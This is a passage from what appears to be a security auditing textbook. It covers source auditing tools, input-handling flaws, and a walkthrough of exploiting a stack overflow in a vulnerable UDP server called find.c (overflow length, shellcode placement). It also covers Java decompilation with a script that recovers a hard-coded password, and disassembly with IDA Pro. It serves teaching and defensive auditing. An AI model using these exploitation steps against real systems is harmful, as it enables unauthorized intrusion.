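/* Hypothetical wrapper around strncpy(): copies src into dst, whose capacity
 * is dst_size bytes, and always null terminates the result.
 * Returns 0 if src fit, 1 if it was truncated, -1 on invalid arguments. */
int copy_string(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0) {
        return -1;
    }
    strncpy(dst, src, dst_size - 1);  /* leave room for the terminator */
    dst[dst_size - 1] = '\0';         /* strncpy() adds none if src is too long */
    return strlen(src) >= dst_size ? 1 : 0;
}
```

The return value lets the caller notice truncation instead of silently continuing with shortened data. The wrapper still relies on the caller passing the true size of the destination buffer.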
It is important to make sure that proper validation of input data is taking place. This
is the time-consuming part of responding to the alerts generated by source auditing
tools. Having spent the time to secure the code, you have little need to spend much more
time determining if the original code was actually vulnerable or not, unless you are trying
to prove a point. Remember, however, that receiving a clean bill of health from a
source code auditing tool by no means implies that the program is bulletproof. The only
hope of completely securing a program is through the use of secure programming practices
from the outset and through periodic manual review by programmers familiar with
how the code is supposed to function.
NOTE For all but the most trivial of programs, it is virtually impossible to
formally prove that a program is secure.
The Black Hat Point of View
The black hat is by definition interested in finding out how to exploit a program. For the
black hat, output of source auditing tools can serve as a jumping-off point for finding
vulnerabilities. The black hat has little reason to spend time fixing the code because this
defeats his purpose. The level of effort required to determine whether a potential trouble
spot is vulnerable is generally much higher than the level of effort the white hat will
expend fixing that same trouble spot. And, as with the white hat, the auditing tool’s output
is by no means definitive. It is entirely possible to find vulnerabilities in areas of a
program not flagged during the automated source audit.
The Gray Hat Point of View
So where does the gray hat fit in here? It is often not the gray hat’s job to fix the source code
she audits. She should certainly present her findings to the maintainers of the software, but
there is no guarantee that they will act on the information, especially if they do not have
the time, or worse, refuse to seriously consider the information that they are being furnished.
In cases where the maintainers refuse to address problems noted in a source code
audit, whether automated or manual, it may be necessary to provide a proof-of-concept
demonstration of the vulnerability of the program. In these cases, it is useful for the gray
hat to understand how to make use of the audit results for locating actual vulnerabilities
and developing proof-of-concept code to demonstrate the seriousness of these vulnerabilities.
Finally, it may fall on the auditor to assist in developing a strategy for mitigating the
vulnerability in the absence of a vendor fix, as well as to develop tools for automatically
locating all vulnerable instances of an application within an organization’s network.
Manual Source Code Auditing
What can you do when an application is programmed in a language that is not supported
by an automated scanner? How can you verify all the areas of a program that the
automated scanners may have missed? How do you analyze programming constructs
that are too complex for automated analysis tools to follow? In these cases, manual
auditing of the source code may be your only option. Your primary focus should be on
the ways in which user-supplied data is handled within the application. Since most vulnerabilities
are exploited when programs fail to properly handle user input, it is important
to first understand how data is passed to an application, and second, to understand
what happens with that data.
Sources of User-Supplied Data
The following list contains just a few of the ways in which an application can receive user
input and some of the C functions used to obtain that input. (This list by no means represents
all possible input mechanisms or combinations.)
• Command-line parameters argv manipulation
• Environment variables getenv()
• Input data files read(), fscanf(), getc(), fgetc(), fgets(), vfscanf()
• Keyboard input/stdin read(), scanf(), getchar(), gets()
• Network data read(), recv(), recvfrom()
It is important to understand that in C, any of the file-related functions can be used to
read data from any file, including the standard C input file stdin. Also, since Unix systems
treat network sockets as file descriptors, it is not uncommon to see file input functions
(rather than the network-oriented functions) used to read network data. Finally, it
is entirely possible to create duplicate copies of file/socket descriptors using the
dup() or dup2() function.
NOTE In C/C++ programs, file descriptors 0, 1, and 2 correspond to the
standard input (stdin), standard output (stdout), and standard error (stderr)
devices. The dup2() function can be used to make stdin become a copy of any
other file descriptor, including network sockets. Once this has been done, a
program no longer accepts keyboard input; instead, input is taken directly from the network
socket.
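The redirection described in this note can be sketched in a few lines of C. The function name read_line_via_stdin() is hypothetical, and the sketch assumes a POSIX system that provides dup2(). Any readable descriptor can be passed in, whether a socket, a pipe, or a file.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: make descriptor 0 (stdin) a copy of fd, then read one
 * line using an ordinary stdio input function.
 * Returns 0 on success, -1 on failure. */
int read_line_via_stdin(int fd, char *out, size_t out_size)
{
    if (out == NULL || out_size == 0) {
        return -1;
    }
    if (dup2(fd, STDIN_FILENO) < 0) {   /* stdin now refers to fd */
        return -1;
    }
    if (fgets(out, (int)out_size, stdin) == NULL) {
        return -1;
    }
    out[strcspn(out, "\n")] = '\0';     /* strip the trailing newline */
    return 0;
}
```

An auditor who sees only the fgets() call on stdin could easily mistake it for keyboard input, which is why calls to dup() and dup2() deserve attention when identifying input sources.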
If stdin has been redirected in this way, you might observe getchar() or gets() being used to read
incoming network data. Several of the source code scanners take command-line options
that will cause them to list all functions (such as those noted previously) in the program
that take external input. Running ITS4 in this fashion against find.c yields the following:
# ./its4 -m -v vulns.i4d find.c
find.c:482: read
find.c:526: read
Be careful not to introduce a buffer overflow when using in a loop.
Make sure to check your buffer boundaries.
----------------
find.c:610: recvfrom
Check to make sure malicious input can have no ill effect.
Carefully check all inputs.
----------------
To locate vulnerabilities, you will need to determine which types of input, if any, result
in user-supplied data being manipulated in an insecure fashion. First, you will need to
identify the locations at which the program accepts data. Second, you will need to determine
if there is an execution path that will pass the user data to a vulnerable portion of
code. In tracing through these execution paths, you need to note the conditions that are
required in order to influence the path of execution in the direction of the vulnerable
code. In many cases, these paths are based on conditional tests performed against the user
data. To have any hope of the data reaching the vulnerable code, the data will need to be
formatted in such a way that it successfully passes all conditional tests between the input
point and the vulnerable code. In a simple example, a web server might be found to be
vulnerable when a GET request is performed for a particular URL, while a POST request for
the same URL is not vulnerable. This can easily happen if GET requests are farmed out to
one section of code (that contains a vulnerability) and POST requests are handled by a different
section of code that may be secure. More complex cases might result from a vulnerability
in the processing of data contained deep within a remote procedure call (RPC)
parameter that may never reach a vulnerable area on a server unless the data is packaged in
what appears, in all respects, to be a valid RPC request.
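The web server case can be pictured as a dispatcher whose conditional tests decide which handler a request reaches. The C sketch below is purely illustrative: the enum and the route_request() function are hypothetical names and do not come from any real server.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical handler identifiers for this illustration. */
enum handler { HANDLER_NONE, HANDLER_GET, HANDLER_POST };

/* Decide which section of code will process a request line. Input reaches a
 * given handler only if it passes that handler's conditional test, so a flaw
 * in one handler is reachable only through requests that satisfy its test. */
enum handler route_request(const char *request)
{
    if (request == NULL) {
        return HANDLER_NONE;
    }
    if (strncmp(request, "GET ", 4) == 0) {
        return HANDLER_GET;
    }
    if (strncmp(request, "POST ", 5) == 0) {
        return HANDLER_POST;
    }
    return HANDLER_NONE;    /* anything else never reaches either handler */
}
```

When tracing an execution path, each such test becomes a constraint that the input must satisfy before it can arrive at the code under examination.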
Common Problems Leading to Exploitable Conditions
Do not restrict your auditing efforts to searches for calls to functions known to present
problems. A significant number of vulnerabilities exist independently of the presence of
any such calls. Many buffer copy operations are performed in programmer-generated
loops specific to a given application, as the programmers wish to perform their own error
checking or input filtering, or the buffers being copied do not fit neatly into the molds of
some standard API functions. Some of the behaviors that auditors should look for include
• Does the program make assumptions about the length of user-supplied data?
What happens when the user violates these assumptions?
• Does the program accept length values from the user? What size data (1, 2, 4
bytes, etc.) does the program use to store these lengths? Does the program use
signed or unsigned values to store these length values? Does the program check
for the possible overflow conditions when utilizing these lengths?
• Does the program make assumptions about the content/format of user-supplied
data? Does the program attempt to identify the end of various user
fields based on content rather than length of the fields?
• How does the program handle situations in which the user has provided more
data than the program expects? Does the program truncate the input data and if
so, is the data properly truncated? Some functions that perform string copying
are not guaranteed to properly terminate the copied string in all cases. One
such example is strncpy. In these cases, subsequent copy operations may result
in more data being copied than the program can handle.
• When handling C style strings, is the program careful to ensure that buffers
have sufficient capacity to handle all characters including the null termination
character?
• For all array/pointer operations, are there clear checks that prevent access
beyond the end of an array?
• Does the program check return values from all functions that provide them?
Failure to do so is a common problem when using values returned from
memory allocation functions such as malloc, calloc, realloc, and new.
• Does the program properly initialize all variables that might be read before they
are written? If not, in the case of local function variables, is it possible to
perform a sequence of function calls that effectively initializes a variable with
user-supplied data?
• Does the program make use of function or jump pointers? If so, do these reside
in writable program memory?
• Does the program pass user-supplied strings to any function that might in turn
use those strings as format strings? It is not always obvious that a string may be
used as a format string. Some formatted output operations can be buried deep
within library calls and are therefore not apparent at first glance. In the past, this
has been the case in many logging functions created by application programmers.
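Several of the questions above concern user-supplied length values. As one illustration, the C sketch below validates a length field before using it. The record format (a 2-byte big-endian length followed by the payload) and the function name extract_payload() are assumptions made for this example only.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record: a 2-byte big-endian length, then that many payload
 * bytes. Copies the payload into out and returns its length, or -1 if the
 * claimed length is inconsistent with the packet or too large for out. */
long extract_payload(const uint8_t *pkt, size_t pkt_len,
                     uint8_t *out, size_t out_size)
{
    if (pkt == NULL || out == NULL || pkt_len < 2) {
        return -1;
    }
    /* Keep the length unsigned. Stored in a signed 16-bit variable, 0xFFFF
     * would become -1 and could slip past a "length <= size" comparison. */
    size_t claimed = ((size_t)pkt[0] << 8) | pkt[1];

    if (claimed > pkt_len - 2) {    /* claims more data than was received */
        return -1;
    }
    if (claimed > out_size) {       /* would overflow the destination */
        return -1;
    }
    memcpy(out, pkt + 2, claimed);
    return (long)claimed;
}
```

The two comparisons answer two separate questions from the list: whether the user’s length agrees with the data actually received, and whether it fits the buffer that will hold it.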
Example Using find.c
Using find.c as an example, how would this process work? We need to start with user
data entering the program. As seen in the preceding ITS4 output, there is a recvfrom()
function call that accepts an incoming UDP packet. The code surrounding the call looks
like this:
char buf[65536];           //buffer to receive incoming udp packet
int sock, pid;             //socket descriptor and process id
struct sockaddr_in fsin;   //internet socket address information
//...
//Code to take care of the socket setup
//...
while (1) {                //loop forever
    unsigned int alen = sizeof(fsin);
    //now read the next incoming UDP packet
    if (recvfrom(sock, buf, sizeof(buf), 0,
                 (struct sockaddr *)&fsin, &alen) < 0) {
        //exit the program if an error occurred
        errexit("recvfrom: %s\n", strerror(errno));
    }
    pid = fork();          //fork a child to process the packet
    if (pid == 0) {        //Then this must be the child
        manage_request(buf, sock, &fsin); //child handles packet
        exit(0);           //child exits after packet is processed
    }
}
The preceding code shows a parent process looping to receive incoming UDP packets
using the recvfrom() function. Following a successful recvfrom(), a child process is
forked and the manage_request() function called to process the received packet. We need
to trace into manage_request() to see what happens with the user’s input. We can see
right off the bat that none of the parameters passed in to manage_request() deals with
the size of buf, which should make the hair on the back of our neck stand up. The
manage_request() function starts out with a number of data declarations as shown here:
162: void manage_request(char *buf, int sock,
163:                     struct sockaddr_in* addr) {
164:     char init_cwd[1024];
165:     char cmd[512];
166:     char outf[512];
167:     char replybuf[65536];
168:     char *user;
169:     char *password;
170:     char *filename;
171:     char *keyword;
172:     char *envstrings[16];
173:     char *id;
174:     char *field;
175:     char *p;
176:     int i;
Here we see the declaration of many of the fixed-size buffers noted earlier by RATS.
We know that the input parameter buf points to the incoming UDP packet, and the
buffer may contain up to 65535 bytes of data (the maximum size of a UDP packet).
There are two interesting things to note here—first, the length of the packet is not passed
into the function, so bounds checking will be difficult and perhaps completely dependent
on well-formed packet content. Second, several of the local buffers are significantly
smaller than 65535 bytes, so the function had better be very careful how it copies information
into those buffers. Earlier, it was mentioned that the buffer at line 172 is vulnerable
to an overflow. That seems a little difficult given that there is a 64KB buffer sitting
between it and the return address.
NOTE Local variables are generally allocated on the stack in the order in
which they are declared, which means that replybuf generally sits between
envstrings and the saved return address. Recent versions of gcc/g++ (version
4.1 and later) perform stack variable reordering, which makes variable
locations far less predictable.
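Under the declaration-order layout this note describes, the distance from envstrings to the saved frame pointer can be estimated by adding up the sizes of the locals declared before it (lines 164 through 171). The C sketch below does that arithmetic. It assumes a 32-bit target with 4-byte pointers, no padding between variables, and no compiler-inserted stack protection; the function names are hypothetical.

```c
#include <stddef.h>

#define PTR_SIZE 4u   /* assumption: 32-bit target with 4-byte pointers */

/* Bytes occupied by the locals that sit between envstrings and the saved
 * frame pointer when variables are laid out in declaration order. */
size_t bytes_between_envstrings_and_saved_fp(void)
{
    return 1024u            /* init_cwd */
         + 512u             /* cmd */
         + 512u             /* outf */
         + 65536u           /* replybuf */
         + 4u * PTR_SIZE;   /* user, password, filename, keyword */
}

/* The same distance expressed as a count of pointer-sized slots. */
size_t pointer_slots_between_envstrings_and_saved_fp(void)
{
    return bytes_between_envstrings_and_saved_fp() / PTR_SIZE;
}
```

With these assumptions the distance works out to 67600 bytes, or 16900 pointer-sized slots. A compiler that reorders or pads stack variables will produce different numbers.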
The function proceeds to set some of the pointers by parsing the incoming packet,
which is expected to be formatted as follows:
id some_id_value\n
user some_user_name\n
password some_users_password\n
filename some_filename\n
keyword some_keyword\n
environ key=value key=value key=value ...\n
The pointers in the stack are set by locating the key name, searching for the following
space, and incrementing by one character position. The values become null terminated
when the trailing \n is located and replaced with \0. If the key names are not found in
the order listed, or trailing \n characters fail to be found, the input is considered malformed
and the function returns. Parsing the packet goes well until processing of the
optional environ values begins. The environ field is processed by the following code
(note, the pointer p at this point is positioned at the next character that needs parsing
within the input buffer):
envstrings[0] = NULL; //assume no environment strings
if (!strncmp("environ", p, strlen("environ"))) {
    field = memchr(p, ' ', strlen(p)); //find trailing space
    if (field == NULL) { //error if no trailing space
        reply(id, "missing environment value", sock, addr);
        return;
    }
    field++; //increment to first character of key
    i = 0; //init our index counter into envstrings
    while (1) { //loop as long as we need to
        envstrings[i] = field; //save the next envstring ptr
        p = memchr(field, ' ', strlen(field)); //trailing space
        if (p == NULL) { //if no space then we need a newline
            p = memchr(field, '\n', strlen(field));
            if (p == NULL) {
                reply(id, "malformed environment value", sock, addr);
                return;
            }
            *p = '\0'; //found newline terminate last envstring
            i++; //count the envstring
            break; //newline marks the end so break
        }
        *p = '\0'; //terminate the envstring
        field = p + 1; //point to start of next envstring
        i++; //count the envstring
    }
    envstrings[i] = NULL; //terminate the list
}
Following the processing of the environ field, each pointer in the envstrings array is
passed to the putenv() function, so these strings are expected to be in the form
key=value. In analyzing this code, note that the entire environ field is optional, but skipping
it wouldn’t be any fun for us. The problem in the code results from the fact that the while
loop that processes each new environment string fails to do any bounds checking on the
counter i, but the declaration of envstrings only allocates space for 16 pointers. If more
than 16 environment strings are provided, the variables located between the envstrings array
and the saved return address will start to get overwritten. We have the makings of a buffer overflow at this
point, but the question becomes: “Can we reach the saved return address?” Performing
some quick math tells us that there are about 67600 bytes of stack space between the
envstrings array and the saved frame pointer/saved return address. Since each member
of the envstrings array occupies 4 bytes, if we add 67600/4 = 16900 additional environment
strings to our input packet, the pointers to those strings will overwrite all of the
stack space up to the saved frame pointer.
Two additional environment strings will give us an overwrite of the frame pointer
and the return address. How can we include 16918 environment strings of the form
key=value in our packet? If a minimal environment string, say x=y, consumes 4 bytes
counting the trailing space, then it would seem that our input packet needs to accommodate
67672 bytes of environment strings alone. Since this is larger than the maximum
UDP packet size, we seem to be out of luck. Fortunately for us, the preceding loop
does no parsing of each environment string, so there is no reason for a malicious user to
use properly formatted (key=value) strings. It is left to the reader to verify that placing
approximately 16919 space characters between the keyword environ and the trailing
newline should result in an overwrite of the saved return address. Since an input
line of that size easily fits in a UDP packet, all we need to do now is consider where to
place our shellcode. The answer is to make it the last environment string, and the nice
thing about this vulnerability is that we don’t even need to determine what value to
overwrite the saved return address with, as the preceding code handles it for us. Understanding
that point is also left to the reader as an exercise.
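From the white hat’s side, the flaw disappears once the loop refuses to store more pointers than envstrings can hold. The following C sketch shows one way such a bounded loop might look. It is not the find.c author’s code: split_environ() and MAX_ENVSTRINGS are hypothetical names, and the parsing is simplified to locate the terminating newline first.

```c
#include <stddef.h>
#include <string.h>

#define MAX_ENVSTRINGS 16   /* matches char *envstrings[16] in the text */

/* Split a space-separated, newline-terminated field in place. At most
 * MAX_ENVSTRINGS - 1 pointers are stored, leaving one slot for the NULL
 * that terminates the list. Returns the number of strings stored, or -1 if
 * the field is malformed or holds too many strings. On -1 the contents of
 * envstrings are unspecified and should be discarded by the caller. */
int split_environ(char *field, char *envstrings[MAX_ENVSTRINGS])
{
    int i = 0;
    char *end = strchr(field, '\n');
    if (end == NULL) {
        return -1;                      /* no terminating newline */
    }
    *end = '\0';

    while (1) {
        if (i >= MAX_ENVSTRINGS - 1) {  /* the bounds check the original lacks */
            return -1;
        }
        envstrings[i++] = field;        /* save the next envstring pointer */
        char *p = strchr(field, ' ');
        if (p == NULL) {
            break;                      /* last string in the field */
        }
        *p = '\0';                      /* terminate this envstring */
        field = p + 1;                  /* move to the next one */
    }
    envstrings[i] = NULL;               /* terminate the list */
    return i;
}
```

Rejecting the whole field when the limit is reached, rather than silently dropping the extra strings, keeps the failure visible to the caller. Validating that each string really has the form key=value would be a sensible further step before calling putenv().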
References
RATS www.fortifysoftware.com/security-resources/rats.jsp
ITS4 www.cigital.com/its4/
FlawFinder www.dwheeler.com/flawfinder/
Splint www.splint.org
PREfast http://research.microsoft.com/displayArticle.aspx?id=634
Binary Analysis
Source code analysis will not always be possible. This is particularly true when evaluating
closed source, proprietary applications. This by no means prevents the reverse engineer
from examining an application; it simply makes such an examination a bit more
difficult. Binary auditing requires a somewhat different skill set than source code auditing.
Whereas a competent C programmer can audit C source code regardless of what
type of architecture the code is intended to be compiled on, auditing binary code
requires additional skills in assembly language, executable file formats, compiler behavior,
operating system internals, and various other lower-level skills. Books offering to
teach you how to program are a dime a dozen, while books that cover the topic of
reverse engineering binaries are few and far between. Proficiency at reverse-engineering
binaries requires patience, practice, and a good collection of reference material. All you
need to do is consider the number of different assembly languages, high-level languages,
compilers, and operating systems that exist to begin to understand how many
possibilities there are for specialization.
Manual Auditing of Binary Code
Two types of tools that greatly simplify the task of reverse engineering a binary file are
disassemblers and decompilers. The purpose of a disassembler is to generate assembly
language from a compiled binary, while the purpose of a decompiler is to attempt to generate
source code from a compiled binary. Each task has its own challenges and both are
certainly very difficult, with decompilation being by far the more difficult of the two.
This is because the act of compiling source code is both a lossy operation, meaning information
is lost in the process of generating machine language, and a one-to-many operation,
meaning there are many valid translations of a single line of source code to
equivalent machine language statements. Information that is lost during compilation
can include variable names and data types, making recovery of the original source code
from the compiled binary all but impossible. Additionally, a compiler asked to optimize
a program for speed will generate vastly different code than that same compiler asked to
optimize that same program for size. So while both compiled versions will be functionally
equivalent, they will look very different to a decompiler.
Decompilers
Decompilation is perhaps the holy grail of binary auditing. With true decompilation, the
notion of a closed source product vanishes, and binary auditing reverts to source code
auditing as discussed previously. As mentioned earlier, however, true decompilation is an
exceptionally difficult task. Some languages lend themselves very nicely to decompilation
while others do not. Languages that offer the best opportunity for decompilation are typically
hybrid compiled/interpreted languages such as Java or Python. Both are examples of
languages that are compiled to an intermediate, machine-independent form, generally
called byte code. This machine-independent byte code is then executed by a machine-dependent
byte code interpreter. In the case of Java, this interpreter is called a Java Virtual
Machine (JVM). Two features of Java byte code make it particularly easy to decompile.
First, compiled Java byte code files, called class files, contain a significant amount of
descriptive information. Second, the programming model for the JVM is fairly simple, and
its instruction set fairly small. Both of these properties are true of compiled Python (pyc)
files and the Python interpreter as well. A number of open source Java decompilers do an
excellent job of recovering Java source code, including JReversePro and Jad. For Python
pyc files, the decompyle project offers source code recovery services, but as of this writing
the open source version only handles Python files from versions 2.3 and earlier (2.5.1 is
the current Python version at this writing).
Java Decompilation Example The following simple example demonstrates the
degree to which source code can be recovered from a compiled Java class file. The original
source for the class PasswordChecker appears here:
public class PasswordChecker {
    public boolean checkPassword(String pass) {
        byte[] pwChars = pass.getBytes();
        for (int i = 0; i < pwChars.length; i++) {
            pwChars[i] += i + 1;
        }
        String pwPlus = new String(pwChars);
        return pwPlus.equals("qcvw|uyl");
    }
}
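The check in checkPassword() is simple arithmetic: it adds i + 1 to the byte at position i and compares the result with a fixed string. Anyone who can read the source can therefore run the transformation backward. The C sketch below does so; recover_password() is a hypothetical name, and the sketch assumes single-byte characters.

```c
#include <stddef.h>
#include <string.h>

/* Undo the transform applied by checkPassword(): the original byte at
 * position i is the encoded byte minus (i + 1).
 * Returns 0 on success, -1 if out is NULL or too small. */
int recover_password(const char *encoded, char *out, size_t out_size)
{
    size_t len = strlen(encoded);
    if (out == NULL || out_size < len + 1) {
        return -1;
    }
    for (size_t i = 0; i < len; i++) {
        out[i] = (char)(encoded[i] - (int)(i + 1));
    }
    out[len] = '\0';
    return 0;
}
```

Applied to the constant "qcvw|uyl", this yields "password", which is why recovering readable source from a class file matters to an auditor.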
JReversePro is an open source Java decompiler that is itself written in Java. Running
JReversePro on the compiled PasswordChecker.class file yields the following:
// JReversePro v 1.4.1 Wed Mar 24 22:08:32 PST 2004
// http://jrevpro.sourceforge.net
// Copyright (C)2000 2001 2002 Karthik Kumar.
// JReversePro comes with ABSOLUTELY NO WARRANTY;
// This is free software, and you are welcome to redistribute
// it under certain conditions; See the File 'COPYING' for more details.
// Decompiled by JReversePro 1.4.1
// Home : http://jrevpro.sourceforge.net
// JVM VERSION: 46.0
// SOURCEFILE: PasswordChecker.java
public class PasswordChecker{
    public PasswordChecker()
    {
        ;
        return;
    }
    public boolean checkPassword(String string)
    {
        byte[] iArr = string.getBytes();
        int j = 0;
        String string3;
        for (;j < iArr.length;) {
            iArr[j] = (byte)(iArr[j] + j + 1);
            j++;
        }
        string3 = new String(iArr);
        return (string3.equals("qcvw|uyl"));
    }
}
The quality of the decompilation is quite good. There are only a few minor differences
in the recovered code. First, we see the addition of a default constructor not present
in the original but added during the compilation process.
NOTE In object-oriented programming languages, object data types generally
contain a special function called a constructor. Constructors are invoked each
time an object is created in order to initialize each new object. A default
constructor is one that takes no parameters. When a programmer fails to
define any constructors for declared objects, compilers generally generate a single default
constructor that performs no initialization.
Second, note that we have lost all local variable names and that JReversePro has generated
its own names according to variable types. JReversePro is able to fully recover
class names and function names, which helps to make the code very readable. If the class
had contained any class variables, JReversePro would have been able to recover their
original names as well. It is possible to recover so much data from Java files because of
the amount of information stored in each class file. This information includes items
such as class names, function names, function return types, and function parameter signatures.
All of this is clearly visible in a simple hex dump of a portion of a class file:
CA FE BA BE 00 00 00 2E 00 1E 0A 00 08 00 11 0A ................
00 03 00 12 07 00 13 0A 00 03 00 14 08 00 15 0A ................
00 03 00 16 07 00 17 07 00 18 01 00 06 3C 69 6E .............<in
01 00 0F 4C 69 6E 65 4E 75 6D 62 65 72 54 61 62 ...LineNumberTab
6C 65 01 00 0D 63 68 65 63 6B 50 61 73 73 77 6F le...checkPasswo
72 64 01 00 15 28 4C 6A 61 76 61 2F 6C 61 6E 67 rd...(Ljava/lang
2F 53 74 72 69 6E 67 3B 29 5A 01 00 0A 53 6F 75 /String;)Z...Sou
72 63 65 46 69 6C 65 01 00 14 50 61 73 73 77 6F rceFile...Passwo
72 64 43 68 65 63 6B 65 72 2E 6A 61 76 61 0C 00 rdChecker.java..
09 00 0A 0C 00 19 00 1A 01 00 10 6A 61 76 61 2F ...........java/
6C 61 6E 67 2F 53 74 72 69 6E 67 0C 00 09 00 1B lang/String.....
01 00 08 71 63 76 77 7C 75 79 6C 0C 00 1C 00 1D ...qcvw|uyl.....
01 00 0F 50 61 73 73 77 6F 72 64 43 68 65 63 6B ...PasswordCheck
65 72 01 00 10 6A 61 76 61 2F 6C 61 6E 67 2F 4F er...java/lang/O
62 6A 65 63 74 01 00 08 67 65 74 42 79 74 65 73 bject...getBytes
01 00 04 28 29 5B 42 01 00 05 28 5B 42 29 56 01 ...()[B...([B)V.
00 06 65 71 75 61 6C 73 01 00 15 28 4C 6A 61 76 ..equals...(Ljav
61 2F 6C 61 6E 67 2F 4F 62 6A 65 63 74 3B 29 5A a/lang/Object;)Z
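As a rough illustration of how much structure these bytes carry, the following Python sketch decodes the first 48 bytes of the dump. It assumes the standard class file layout (a 4-byte magic number, 2-byte minor and major versions, a 2-byte constant pool count, then tagged constant pool entries). The function names are illustrative, and only the handful of constant tags that appear in this excerpt are handled.

```python
import struct

# First 48 bytes of PasswordChecker.class, copied from the hex dump above.
CLASS_BYTES = bytes.fromhex(
    "CA FE BA BE 00 00 00 2E 00 1E 0A 00 08 00 11 0A "
    "00 03 00 12 07 00 13 0A 00 03 00 14 08 00 15 0A "
    "00 03 00 16 07 00 17 07 00 18 01 00 06 3C 69 6E"
)

TAG_NAMES = {1: "Utf8", 7: "Class", 8: "String", 10: "Methodref", 12: "NameAndType"}
FIXED_PAYLOAD = {7: 2, 8: 2, 10: 4, 12: 4}  # payload bytes that follow the tag


def parse_header(data):
    """Return (magic, minor, major, constant_pool_count) from a class file."""
    return struct.unpack(">IHHH", data[:10])


def walk_constants(data, offset=10):
    """List the tag names of every complete constant pool entry in data.

    Stops at the first truncated entry or unrecognized tag.
    """
    names = []
    while offset < len(data):
        tag = data[offset]
        if tag == 1:  # Utf8: 2-byte length followed by that many bytes
            if offset + 3 > len(data):
                break
            (length,) = struct.unpack(">H", data[offset + 1:offset + 3])
            size = 2 + length
        elif tag in FIXED_PAYLOAD:
            size = FIXED_PAYLOAD[tag]
        else:
            break
        if offset + 1 + size > len(data):
            break
        names.append(TAG_NAMES[tag])
        offset += 1 + size
    return names


magic, minor, major, pool_count = parse_header(CLASS_BYTES)
print(hex(magic), "version %d.%d" % (major, minor), pool_count)
print(walk_constants(CLASS_BYTES))
```

The major version decoded here, 46, matches the JVM VERSION line that JReversePro printed. The walk stops at the ninth entry because the excerpt ends partway through a Utf8 string.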
With all of this information present, it is a relatively simple matter for any Java
decompiler to recover high-quality source code from a class file.
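Once the logic has been recovered, the check itself offers little protection. The following Python sketch mirrors the checkPassword() transformation and then inverts it to recover the expected input. It assumes the password consists of ASCII characters; the function names are ours, not part of the original class.

```python
TARGET = "qcvw|uyl"  # string literal recovered from the class file


def check_password(candidate):
    """Mirror of checkPassword(): add i + 1 to the byte at index i."""
    shifted = bytes((b + i + 1) & 0xFF
                    for i, b in enumerate(candidate.encode("ascii")))
    return shifted == TARGET.encode("ascii")


def recover_password(target):
    """Undo the transformation by subtracting i + 1 from each byte."""
    original = bytes((b - (i + 1)) & 0xFF
                     for i, b in enumerate(target.encode("ascii")))
    return original.decode("ascii")


password = recover_password(TARGET)
print(password, check_password(password))
```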
Decompilation in Other Compiled Languages Unlike Java and Python,
which compile to a platform-independent byte code, languages like C and C++ are compiled
to platform-specific machine language, and linked to operating system–specific
libraries. This is the first obstacle to decompiling programs written in such languages. A
different decompiler would be required for each machine language that we wish to
decompile. Further complicating matters, compiled programs can generally be stripped
of all debugging and naming (symbol) information, making it impossible to recover
any of the original names used in the program, including function and variable names
and type information. Nevertheless, research and development on decompilers does
continue. The leading contender in this arena is a new product from the author of the
Interactive Disassembler Professional (IDA Pro). The tool, named Hex-Rays, is an IDA
plug-in that can be used to generate decompilations of compiled x86 programs.
Disassemblers
While decompilation of compiled code is an extremely challenging task, disassembly of
that same code is not. For any compiled program to execute, it must communicate some
information to its host operating system. The operating system will need to know the
entry point of the program (the first instruction that should execute when the program
is started), the desired memory layout of the program including the location of code and
data, and what libraries the program will need access to while it is executing. All of this
information is contained within an executable file and is generated during the compilation
and linking phases of the program’s development. Loaders interpret these executable
files to communicate the required information to the operating system when a file
is executed. Two common executable file formats are the Portable Executable (PE) file
format used for Microsoft Windows executables, and the Executable and Linking Format
(ELF) used by Linux and other Unix variants. Disassemblers function by interpreting
these executable file formats (in a manner similar to the operating system loader) to
learn the layout of the executable, and then processing the instruction stream starting
from the entry point to break the executable down into its component functions.
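To make the loader's view concrete, here is a minimal Python sketch that pulls the machine type and entry point out of a 32-bit little-endian ELF header. The sample header is synthetic and its entry point value is hypothetical. A real disassembler would go on to read the program and section headers as well.

```python
import struct


def read_elf32_entry(header):
    """Return (e_machine, e_entry) from the first 28 bytes of an ELF32 file."""
    ident, e_type, e_machine, e_version, e_entry = struct.unpack(
        "<16sHHII", header[:28])
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if ident[4] != 1 or ident[5] != 1:
        raise ValueError("this sketch only handles 32-bit little-endian ELF")
    return e_machine, e_entry


# Synthetic header: ELF magic, 32-bit class, little-endian data, version 1,
# then e_type=2 (executable), e_machine=3 (x86), e_version=1, and a
# hypothetical entry point.
SAMPLE = (b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
          + struct.pack("<HHII", 2, 3, 1, 0x080489F0))

machine, entry = read_elf32_entry(SAMPLE)
print("machine:", machine, "entry point: %08X" % entry)
```

To try this against a real binary, read the first 28 bytes of the file in binary mode and pass them to read_elf32_entry().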
IDA Pro
IDA Pro was created by Ilfak Guilfanov of DataRescue Inc., and as mentioned earlier it is
perhaps the premier disassembly tool available today. IDA understands a large number
of machine languages and executable file formats. At its heart, IDA is actually a database
application. When a binary is loaded for analysis, IDA loads each byte of the binary into
a database and associates various flags with each byte. These flags can indicate whether a
byte represents code, data, or more specific information such as the first byte of a
multibyte instruction. Names associated with various program locations and comments
generated by IDA or entered by the user are also stored into the database. Disassemblies
are saved as .idb files separate from the original binary, and .idb files are referred to
as database files. Once a disassembly has been saved to its associated database file, IDA
has no need for the original binary, as all information is incorporated into the database
file. This is useful if you want to analyze malicious software but don’t want the malicious
binary to remain present on your system.
When used to analyze dynamically linked binaries, IDA Pro makes use of embedded
symbol table information to recognize references to external functions. Within IDA
Pro’s disassembly listing, the use of standard library names helps make the listing far
more readable. For example,
call strcpy
is far more readable than
call sub_8048A8C ;call the function at address 8048A8C
For statically linked C/C++ binaries, IDA uses a technique termed Fast Library Identification
and Recognition Technology (FLIRT), which attempts to recognize whether a given
machine language function is known to be a standard library function. This is accomplished
by matching disassembled code against signatures of standard library functions
used by common compilers. With FLIRT and the application of function type signatures,
IDA is able to produce a much more readable disassembly.
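The general idea of signature matching can be sketched in a few lines of Python. This is a greatly simplified illustration and not FLIRT's actual signature format: the byte patterns and function names below are made up, and None marks bytes that are allowed to vary between builds (for example, relocated addresses).

```python
# Hypothetical signatures: leading bytes of a library function, with None
# standing in for bytes that differ from one binary to the next.
SIGNATURES = {
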